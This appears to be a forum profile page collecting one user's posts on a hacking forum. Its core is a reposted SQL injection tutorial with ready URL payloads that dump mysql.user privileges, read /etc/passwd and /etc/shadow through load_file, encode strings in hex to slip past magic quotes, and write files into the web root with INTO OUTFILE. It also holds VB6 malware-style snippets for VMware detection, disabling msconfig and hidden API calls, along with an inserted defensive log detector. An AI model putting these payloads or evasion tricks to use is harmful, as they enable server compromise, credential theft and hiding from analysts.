Everything posted by Nytro
-
That's not what giving author credit means. So there's no need to specify the page the information was taken from, only when it's an article that doesn't have the author specified, or other such cases.
-
MySQL Injection - Simple Load File and Into OutFile
Nytro replied to Nytro's topic in Tutorials in English
I didn't quite understand what you mean. You put whatever table name, column or file you want. It just has to exist on the server.
-
It won't contain any GPS location mechanism. It's the same thing as with the ID card: a photo of you and other nonsense. But it's more "cool", more "trendy". I don't really understand those illiterate believers going: "The chip contains Satan!!". What's the connection between these chips and Satan?
-
MySQL Injection - Simple Load File and Into OutFile
Nytro replied to Nytro's topic in Tutorials in English
The "mysql" database, together with its tables, already exists. They belong to the MySQL server.
-
I think it's about [..] meaning [ .. ] and I think it works
-
I also fixed the emoticon "menu". Now they no longer repeat (the first ones that appear there): I'm waiting here for emoticon-related problems. I don't want to see other nonsense or tests here.
-
I voted Mandriva because it's the distribution I use and the one I think I liked the most. Advantages: KDE (you can choose Gnome at install time, I can't stand Gnome), a Package Manager that doesn't create as many problems as Synaptic (well, I wanted to uninstall Avahi and it would have removed Eclipse and many other useful things too, which I have no idea how they're related), it has its own options (Configure your computer) from where you can make many useful changes, it comes with a wide range of packages, it updates itself automatically (I even upgraded to Spring) and much more. I also liked Slackware, which is less user-friendly but from which I learned a lot. I liked that I stayed logged in as root and did whatever I felt like, I edited all my "start-up" files, did whatever came to mind, and I had made it boot very fast (I had removed setting the hardware clock, hostname and many others).
-
MySQL Injection - Simple Load File and Into OutFile

| MySQL Injection - Simple Load File and Into OutFile (tutorial) |
| Author: MikiSoft |
----------------------------------------------------------------

=== [ Part 1 - Introduction ]

If you know (basic) MySQL Injection, you can read this tutorial... OK, let's now see what Load File and Into OutFile are.

-- What are Load File and Into OutFile?

They are syntaxes (used in MySQL Injections).

Load File: Reads the file and returns the file contents as a string.

Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. The file to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed. (... from: MySQL.com)

OK, let's begin now!

=== [ Part 2 - Access to the "mysql.user" table and file privileges ]

If you are using the MySQL Injection method (to hack sites), then before you find the target table (and columns), check whether you have access to the "mysql.user" table. You must replace one visible column in the URL (i.e. a number that is shown on the page) with the (string) "user", to see the user name. Let's see our example:

http://vulnsite.com/index.php?id=-1+union+all+select+1,user,3,4+from+mysql.user--

In our example, column (number) 2 can be seen on our vulnerable page. If the page returns a user name in the place where that visible column is shown on the site, that's good - you have access (to the "mysql.user" table), and you can continue reading this tutorial. Don't forget to remember the user name that you have seen! In our example that happens (we have access to the "mysql.user" table), and we can now continue to check whether we have file privileges. You must now replace "user" in the URL with the (string) "group_concat(user,0x3a,file_priv)", to check whether you have file privileges on (your) vulnerable site. Here is our example:

http://vulnsite.com/index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--

Now, in the place where that (visible) column is shown (i.e. replaced), it lists users and file privileges (in the format: User name:File privileges, ...), and you must find the user name you have seen before. When you find that user name, look on the right side (next to that user name): if it says "Y" (that means Yes), you have file privileges (and you can continue reading this tutorial); otherwise, if it says "N" (that means No), you don't have file privileges. In our example we have file privileges (of course) - "... ,ouruser:Y, ...". Let's go now to the next part.

=== [ Part 3 - Using the Load File syntax ]

Load File is useful when you want to read some (configuration) files (it's like LFI - Local File Inclusion), e.g. "/etc/passwd", "/etc/shadow", etc.

Syntax is: load_file('FILE')

Here is our example - if we want to read the "/etc/passwd" file:

http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user--

In the place where column (number) 2 is, it will show the (source of the) "/etc/passwd" file (on the page).

Note 1: "../" means move one directory back.

Note 2: If it shows an error (when you try to read some file), magic quotes are enabled (they add slashes before and after "'" symbols), and you have to (avoid that and) convert the file name (i.e. text/string) to Hex or Char (and then remove the "'" symbols):

For Hex - Always put "0x" (text) before the hex string (without any spaces), and that (final) string must not contain (any) spaces(!); e.g. (Load File - "/etc/passwd"): load_file(0x2f6574632f706173737764)

For Char - Usage: char(NUMBERS,NUMBERS,NUMBERS...); if you convert the string (i.e. text) to Char and the converted text (in Char) contains spaces (between numbers), you must replace all those spaces with commas(!); e.g. (Load File - "/etc/passwd"): load_file(char(47,101,116,99,47,112,97,115,115,119,100))

BTW. Here is one translator, i.e. a text to Hex and (text to) Char converter: http://home2.paulschou.net/tools/xlate/

That's all for the Load File syntax.

=== [ Part 4 - Using the Into OutFile syntax ]

Into OutFile is useful when you want to write/make some file (on your vulnerable site/server), e.g. make a (simple PHP) file that is vulnerable to RFI (Remote File Inclusion), and then exploit that hole...

Syntax is: INTO OUTFILE 'FILE'

Note 1: That syntax must always be at the end (it's like a table)! E.g. ...+INTO+OUTFILE+'/FILE'--

To write (your) text into (your) file (on the vulnerable site/server), replace one visible column in the URL (i.e. a number that is shown on the page) with (your) text (to be written into your file), in quotes... Let's see our example - we want to write the text "testing" into the file "test.txt" (on our vulnerable site/server), in the site directory:

http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--

Note 2: If you have two or more visible columns (i.e. numbers that are shown on your vulnerable page), you have to replace those columns (i.e. numbers, in the URL) with the word "null"(!) (If you don't replace them, those numbers will be written together with your text into your file, on the vulnerable site/server.) In our example, the visible columns are 2 and 3 (and we must do the replacing):

http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--

And then, if the page loads normally (without any errors), we have successfully made our file (on our vulnerable site/server), and the location of our file (on our vulnerable site/server) will be: http://vulnsite.com/test.txt

Note 3: If you want to use the Return/Enter key in (your) text (to be written into your file), just (type your text somewhere - in the converter/translator, and) convert it to Hex or Char...

Note 4: You must write (i.e. make all your files) into the site path, otherwise the Into OutFile syntax won't work.

Note 5: If it shows a blank (i.e. an error, on the page) where (your) text (to be written into your file) should be located, magic quotes are enabled (they add slashes before and after "'" symbols), and you have to (avoid that and) convert the text (i.e. string) to Hex or Char (and then remove the "'" symbols) - see the explanation above (and the link to the converter), at the (end of) part 3...

Warning: Don't convert (your) file name into Hex or Char, otherwise it won't work (that's only for the Into OutFile syntax)! And, if (your) vulnerable site has the magic quotes (feature) enabled, the Into OutFile syntax will not work.

That's all for the Into OutFile syntax.

=== [ Part 5 - End ]

That's all about those syntaxes, used in MySQL Injections (with access to the "mysql.user" table, of course)... I don't know what else to say, just - GL & HF!!!

-- Greetz to (communities): Ljuska.org, MadSpot.org

That's all folks! Bye.

===

@ Exploit-DB
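As an added example (not part of MikiSoft's tutorial or of this thread), here is a small Python detector, written from the defender's side, that runs over constructed web-server access-log lines and flags the union / mysql.user / load_file / INTO OUTFILE requests the tutorial walks through, decoding the 0x... and char(...) literals so the targeted file path shows up in the alert. The log lines, the rule names and the function names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from any real server); the URLs mirror the
# tutorial's own vulnsite.com examples, with quote characters percent-encoded.
SAMPLE_LOG = """\
10.0.0.9 - - [01/Jan/2011:10:00:01 +0000] "GET /index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user-- HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2011:10:00:02 +0000] "GET /index.php?id=-1+union+all+select+1,load_file(0x2f6574632f706173737764),3,4+from+mysql.user-- HTTP/1.1" 200 1800
10.0.0.9 - - [01/Jan/2011:10:00:03 +0000] "GET /index.php?id=-1+union+all+select+1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3,4-- HTTP/1.1" 200 1800
10.0.0.9 - - [01/Jan/2011:10:00:04 +0000] "GET /index.php?id=-1+union+all+select+1,%22testing%22,null,4+INTO+OUTFILE+%27/home/vulnsite/www/test.txt%27-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2011:10:00:05 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512
"""

HEX_LIT = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
CHAR_LIT = re.compile(r"char\(([\d\s,]+)\)", re.IGNORECASE)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
RULES = {  # run over the normalised query; group 1, where present, is the file path
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "mysql_user_probe": re.compile(r"\bmysql\.user\b"),
    "file_priv_check": re.compile(r"\bfile_priv\b"),
    "load_file": re.compile(r"\bload_file\s*\(\s*'([^']*)'"),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\s+'([^']*)'"),
}

def normalize(query: str) -> str:
    """URL-decode, then unwrap the 0x.. and char(..) literals used to dodge magic_quotes."""
    s = unquote_plus(query)
    s = HEX_LIT.sub(lambda m: "'%s'" % bytes.fromhex(m.group(1)).decode("latin-1"), s)
    s = CHAR_LIT.sub(lambda m: "'%s'" % "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), s)
    return s.lower()

def inspect_request(url: str) -> dict:
    """Return the rules a request trips and any decoded file paths it names."""
    norm = normalize(url.partition("?")[2])
    hits, paths = [], []
    for name, rx in RULES.items():
        m = rx.search(norm)
        if m:
            hits.append(name)
            if m.groups() and m.group(1):
                paths.append(m.group(1))
    return {"rules": hits, "paths": paths}

def scan_log(text: str) -> list:
    """Flag log lines whose request trips at least one rule."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if m and (verdict := inspect_request(m.group(2)))["rules"]:
            alerts.append({"ip": m.group(1), "url": m.group(2), **verdict})
    return alerts
```

On the server side the same requests are defeated by parameterised queries, by not granting the application account the FILE privilege, and by setting secure_file_priv so load_file/INTO OUTFILE cannot reach the web root.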
-
By Victor A. Milokum, Apriorit Inc | 17 Mar 2010. The article: http://www.codeproject.com/KB/system/sst-unhook.aspx
-
I'm posting the link, it's laid out and looks much better there. By SergeyPopenko, Apriorit Inc, Ivan Romanenko | 17 Aug 2009. The article here: http://www.codeproject.com/KB/system/hide-driver.aspx
-
'-----------------------------------------
'Detect VMWare
'Tested : VMWare 6.0 -> 7.0
'Coder  : DungCoi (VirusVN.com)
'Email  : dungcoivb@gmail.com
'-----------------------------------------
Private Type DISPLAY_DEVICE
    cb As Long
    DeviceName As String * 32
    DeviceString As String * 128
    StateFlags As Long
    DeviceID As String * 128
    DeviceKey As String * 128
End Type

' SYSTEM_INFO and GetSystemInfo are declared but not used by the check below.
Private Type SYSTEM_INFO
    dwOemID As Long
    dwPageSize As Long
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    dwReserved As Long
End Type

Private Declare Sub GetSystemInfo Lib "kernel32" (lpSystemInfo As SYSTEM_INFO)

' EnumDisplayDevicesA returns a 32-bit BOOL, so it is declared As Long and tested against 0.
Private Declare Function EnumDisplayDevices Lib "user32" Alias "EnumDisplayDevicesA" (Unused As Any, ByVal iDevNum As Long, lpDisplayDevice As DISPLAY_DEVICE, ByVal dwFlags As Long) As Long

Sub Main()
    Dim strVGA As String
    ' The DeviceString of the primary display adapter names the vendor; under VMware it contains "VMware".
    strVGA = getVGACard
    If InStr(1, LCase(strVGA), "vmware") > 0 Then
        MsgBox "Dze dze. VMWare", , "VirusVN.com"
    Else
        MsgBox "I'm not running on VMWare :P", , "VirusVN.com"
    End If
    End
End Sub

Public Function getVGACard() As String
    Dim DD As DISPLAY_DEVICE
    Dim nNull As Long
    DD.cb = Len(DD)
    If EnumDisplayDevices(ByVal 0&, 0, DD, ByVal 0&) <> 0 Then
        ' Cut the fixed-length buffer at its first NUL; keep the whole buffer if there is none
        nNull = InStr(1, DD.DeviceString, Chr$(0))
        If nNull > 0 Then
            getVGACard = Left$(DD.DeviceString, nNull - 1)
        Else
            getVGACard = DD.DeviceString
        End If
    Else
        getVGACard = ""
    End If
End Function
-
'KERNEL32
Private Declare Function CreateSemaphoreW Lib "KERNEL32" (ByVal lpSemaphoreAttributes As Long, ByVal lInitialCount As Long, ByVal lMaximumCount As Long, ByVal lpName As Long) As Long

'---------------------------------------------------------------------------------------
' Procedure : DisableMsConfig
' Author    : Karcrack
' Date      : 12/08/2010
'---------------------------------------------------------------------------------------
'
Public Function DisableMsConfig() As Boolean
    ' Creates the named semaphore msconfig.exe uses as its single-instance check.
    ' The handle is deliberately kept open; closing it would release the name again.
    ' LastDllError = 0 means the semaphore was newly created (not ERROR_ALREADY_EXISTS).
    Call CreateSemaphoreW(0, 0, 1, StrPtr("MSConfigRunning"))
    DisableMsConfig = (Err.LastDllError = 0)
End Function
-
Author: Karcrack
Source: http://www.advancevb.com.ar/?p=567

'---------------------------------------------------------------------------------------
' Module    : mZombieInvoke
' Author    : Karcrack
' Now       : 09/08/2010 13:37
' Purpose   : Calling API without declaring
'             Only uses VB6 functions
' History   : 20100908 First cut .......................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Type Zombie_STRUCT1
    cNull As Currency   'Must be 0
    ppS2 As Long        'Pointer to pointer to Zombie_STRUCT2
End Type

Private Type Zombie_STRUCT2
    lNull As Long       'Must be 0
    lAddr As Long       'The Addr
End Type

Private Type tAPICall
    ptsLIB As Long      ' Pointer to ANSI String that contains Library (NULL TERMINATED!)
    ptsProc As Long     ' Pointer to ANSI String that contains Procedure (NULL TERMINATED!)
    lReserved As Long   ' Just reserved...
    lPointer As Long    ' Pointer to the buffer that will contain temp variables from DllFunctionCall
    lpBuffer(3) As Long ' Buffer that will contain temp variables
End Type

Private Type DUMB_LONG
    lLNG As Long
End Type

Private Type BYTES_LONG
    b1 As Byte: b2 As Byte
    b3 As Byte: b4 As Byte
End Type

'MSVBVM60
Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long
Private Declare Function Zombie_AddRef Lib "MSVBVM60" (ByRef tStructure As Zombie_STRUCT1) As Long

' Buffer that receives the machine code built by Invoke
Private bvASM(&HFF) As Byte

Public Function Invoke(ByVal sLibName As String, ByVal sProcName As String, ParamArray vParams() As Variant) As Long
    Dim hMod As Long
    Dim S1 As Zombie_STRUCT1
    Dim S2 As Zombie_STRUCT2
    Dim i As Long
    Dim iCount As Long

    hMod = GetPointer(sLibName, sProcName)

    '//POP EAX
    '//POP EBX
    '//PUSH EAX
    Call AddByte(&H58, iCount): Call AddByte(&H5B, iCount): Call AddByte(&H50, iCount)
    For i = UBound(vParams) To LBound(vParams) Step -1
        '//PUSH CLng(vParams(i))
        Call AddPush(CLng(vParams(i)), iCount)
    Next i
    '//CALL hMod
    '//RET
    Call AddCall(hMod, iCount): Call AddByte(&HC3, iCount)

    S2.lAddr = VarPtr(bvASM(0))
    S1.ppS2 = VarPtr(VarPtr(S2))
    Invoke = Zombie_AddRef(S1)
End Function

Private Function GetPointer(ByVal sLib As String, ByVal sProc As String) As Long
    Dim tAPI As tAPICall
    Dim bvLib() As Byte
    Dim bvMod() As Byte

    bvLib = StrConv(sLib + vbNullChar, vbFromUnicode): bvMod = StrConv(sProc + vbNullChar, vbFromUnicode)

    With tAPI
        .ptsLIB = VarPtr(bvLib(0)): .ptsProc = VarPtr(bvMod(0))
        .lReserved = &H40000: .lPointer = VarPtr(.lpBuffer(0))
    End With

    GetPointer = DllFunctionCall(tAPI)
End Function

Private Sub AddCall(ByVal lpPtrCall As Long, ByRef iCount As Long)
    Call AddByte(&HB8, iCount)      '//MOV EAX, ________
    Call AddLong(lpPtrCall, iCount) '//_______, XXXXXXXX
    Call AddByte(&HFF, iCount)      '//CALL EXX
    Call AddByte(&HD0, iCount)      '//____ EAX
End Sub

Private Sub AddPush(ByVal lLong As Long, ByRef iCount As Long)
    Call AddByte(&H68, iCount)      '//PUSH, ________
    Call AddLong(lLong, iCount)     '//____, XXXXXXXX
End Sub

Private Sub AddLong(ByVal lLong As Long, ByRef iCount As Long)
    'Swap Endian (e.g. 0xDEADBEEF <-> 0xEFBEADDE)
    Dim tDL As DUMB_LONG
    Dim tBL As BYTES_LONG

    tDL.lLNG = lLong
    LSet tBL = tDL

    Call AddByte(tBL.b1, iCount): Call AddByte(tBL.b2, iCount)
    Call AddByte(tBL.b3, iCount): Call AddByte(tBL.b4, iCount)
End Sub

Private Sub AddByte(ByVal bByte As Byte, ByRef iCount As Long)
    bvASM(iCount) = bByte: iCount = iCount + 1
End Sub

Sample:

Invoke "USER32", "MessageBoxW", 0, StrPtr("Karcrack FTW!!!"), StrPtr("Fuck yeah!"), 0

See what it does in the sample. It only uses APIs from MSVBVM60.DLL.
-
1) The idea of IP Stealing is pathetic. If your program is running, you can do anything on that PC, but you take its IP? Then what? 2) The method is extremely stupid. I saw that System.Net.Dns.GetHostByName and System.Net.Dns.GetHostName exist, but the APIs (gethostbyname and gethostname) would be preferable. Downloading a page in which the IP appears and reading it from there... Anyway, congratulations, most people are "asleep", it's good that there are still people interested in certain things.
-
Rather than paying you, he'd better give her 20-30-50 RON and she'll give him the password.
-
sosetutza: I know, I added them for every combination, that is so that ": D" and ": d" and others work too. pax: http://i38.tinypic.com/15pgw1i.png
-
Search around here for: Simple IM programming, or something like that. The basic ideas are presented there, the rest depends on you.
-
There's a lot to know for something like that. First of all you need solid networking knowledge. Then the big problem appears. The YMSG protocol (I think you mean booters for Yahoo! Messenger, so you can "kick out" your enemies from messenger) is not public, and you have to do sniffing to catch some things. And if you catch them, you also have to figure out what their purpose is. Anyway, search for, download and look over libpurple.
-
Here's a better idea. You make 1000 accounts and log into them one by one. I think those who were "active" in the last half hour are kept as "online". If you're fast you'll beat the record by yourself.
-
Topics like these are useful. Through them they show us how smart they are and we know what to expect from them.
-
"so WMP supports JavaScript?" I like it, but I want to make a small correction. WMP doesn't support JavaScript; rather, it uses ieframe.dll (or shadowctl.dll, I think), which is an ActiveX control. How to put it... It embeds the functionality of the IE browser. I think you'll understand better if you read/watch one of the many tutorials on "creating a browser in VB6".
-
Think of an article you'd like to write and send me a PM with a few details about it, if you're interested.
-
I think the first 2 volumes are enough. The first presents the basics, and the second slightly more complicated things. I didn't even know volume 4 existed.
-
Unpatched kernel-level vuln affects all Windows versions
Nytro replied to Dragos's topic in Security news
What the one who discovered the problem (arkon) says on his blog: "It's very hard to exploit it for code execution, on the edge of impossible. That's why I felt safe about releasing it publicly. Still curious, if anybody is able to do it."